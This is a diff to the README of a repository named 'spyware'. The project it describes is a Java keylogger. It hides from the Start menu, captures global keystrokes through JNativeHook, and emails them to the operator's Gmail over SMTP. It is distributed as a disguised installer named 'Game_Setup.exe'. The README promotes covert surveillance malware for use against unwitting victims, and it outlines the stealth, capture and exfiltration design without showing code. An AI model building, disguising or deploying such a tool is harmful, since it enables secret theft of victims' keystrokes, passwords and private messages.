BojanPetrov/spyware/README.md

 - **Stealth Mode**: The application is hidden from the Start menu and runs in the background without being visible to the user.
 - **Bundled JRE**: The installer includes a 32-bit version of JRE 1.8, so no separate Java installation is required for running the application.

+## How It Works

+- The application operates as a **background Java process**.
+- It uses several additional libraries, including:
+  - `JNativeHook` for capturing global key events.
+  - `smtp`, `imap`, and `mailapi` for handling email communication.
+- The captured keystrokes are **sent to your Gmail account** through an SMTP connection.
+- After recording the keystrokes, the data is automatically sent to your email for monitoring purposes.

 ## Installation

 1. Download the `Game_Setup.exe` file from the [Releases](#) section.